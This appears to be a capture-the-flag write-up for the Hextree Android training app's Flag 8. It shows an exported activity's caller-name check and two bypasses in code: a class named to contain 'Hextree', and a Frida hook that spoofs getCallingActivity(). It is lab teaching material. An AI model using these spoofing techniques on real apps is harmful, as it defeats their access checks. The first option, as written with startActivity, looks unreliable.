0xAnan's Dojo

Graph View

Flag 8 - Did You Expect a Result?

3 min read

Static Analysis

AndroidManifest.xml

Upon inspecting the Flag7Activity in the AndroidManifest.xml file we see the following

<activity  
	android:name="io.hextree.attacksurface.activities.Flag8Activity"  
	android:exported="true"/>

Since exported is set to true we can call this activity from our exploit apk, let’s review the code to see how can we get the flag

Flag8Activity Class

/* loaded from: classes.dex */  
public class Flag8Activity extends AppCompactActivity {  
    public Flag8Activity() {  
        this.name = "Flag 8 - Do you expect a result?";  
        this.tag = "ActivityResult";  
        this.flag = "SswwbqGWnA950TVWt2lccPUGxr4PyWorpunFllh8DOY=";  
    }  
  
    @Override // io.hextree.attacksurface.AppCompactActivity, androidx.fragment.app.FragmentActivity, androidx.activity.ComponentActivity, androidx.core.app.ComponentActivity, android.app.Activity  
    protected void onCreate(Bundle bundle) {  
        super.onCreate(bundle);  
        Log.i("Process", "id in stealing flag 8: " + Process.myPid());  
        this.f = new LogHelper(this);  
        ComponentName callingActivity = getCallingActivity();  
        if (callingActivity != null) {  
            if (callingActivity.getClassName().contains("Hextree")) {  
                this.f.addTag("calling class contains 'Hextree'");  
                success(this);  
            } else {  
                Log.i("Flag8", "access denied");  
                setResult(0, getIntent());  
            }  
        }  
    }  
}

Upon review the code we notice it only checks on thing in this code snippet:

if (callingActivity.getClassName().contains("Hextree")) {  
	this.f.addTag("calling class contains 'Hextree'");  
	success(this);  
}

It checks if the class name contains Hextree in it or not, Pretty simple condition so let’s craft the POC

Creating POC

Option 1

We can simply create the class with Hextree in it like this:

public class HextreeFlag8 extends AppCompatActivity {
 
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_flag08);
 
        Button button = findViewById(R.id.button_flag8);
        button.setOnClickListener(new View.OnClickListener() {
            @Override
            public void onClick(View v) {
                Log.v("HEXTREE", "Going to flag 8 activity");
 
                Intent targetIntent = new Intent();
                targetIntent.setComponent(new ComponentName("io.hextree.attacksurface", "io.hextree.attacksurface.activities.Flag8Activity"));
 
                startActivity(targetIntent);
            }
        });
    }
}

Option 2

I didn’t want to change the class name from Flag08 to a name containing Hextree so I used Frida to intecept the apk and return the desired component name here’s the steps

Download frida and set it up on the emulator

 adb push frida-server /data/local/tmp/
frida-server: 1 file pushed, 0 skipped. 315.5 MB/s (110713240 bytes in 0.335s)                                                                                                              
 
 adb shell "chmod 755 /data/local/tmp/frida-server"
                                                                                                                            
 adb shell "./data/local/tmp/frida-server"

You can download the executable from Frida’s github releases page

Creating the script and connecting to frida’s server

We will create a script that hooks to getCallingActivity() and returns a ComponentName containing Hextree

Java.perform(()=>{
    var Activity = Java.use("android.app.Activity");
    // Editing the getCallingActivity's implementation to return the desired ComponentName
    Activity.getCallingActivity.implementation = function () {
        var fakeComponent = Java.use("android.content.ComponentName")
            .$new("com.fake.Hextree", "com.fake.Hextree.HextreeActivity");
 
        console.log("[+] Hooked getCallingActivity(), returning fake ComponentName");
        return fakeComponent;
    };
})

After that we just run frida on the target APK

 frida -U -l flag9.js -N "io.hextree.attacksurface"
     ____
    / _  |   Frida 17.5.1 - A world-class dynamic instrumentation toolkit
   | (_| |
    > _  |   Commands:
   /_/ |_|       help      -> Displays the help system
   . . . .       object?   -> Display information about 'object'
   . . . .       exit/quit -> Exit
   . . . .
   . . . .   More info at https://frida.re/docs/home/
   . . . .
   . . . .   Connected to Android Emulator 5554 (id=emulator-5554)
[Android Emulator 5554::io.hextree.attacksurface ]->

Now we just call Flag8Activity with any class we want and we will get the flag! Button to retrieve the flag:

Button button = findViewById(R.id.button_flag8);
button.setOnClickListener(new View.OnClickListener() {
	@Override
	public void onClick(View v) {
		Log.v("HEXTREE", "Going to flag 8 activity");
 
		Intent targetIntent = new Intent();
		targetIntent.setComponent(new ComponentName("io.hextree.attacksurface", "io.hextree.attacksurface.activities.Flag8Activity"));
 
		startActivity(targetIntent);
	}
});

Output in frida

[Android Emulator 5554::io.hextree.attacksurface ]-> [+] Hooked getCallingActivity(), returning fake ComponentName

Flag

HXT{no-expected-return-ds282ba}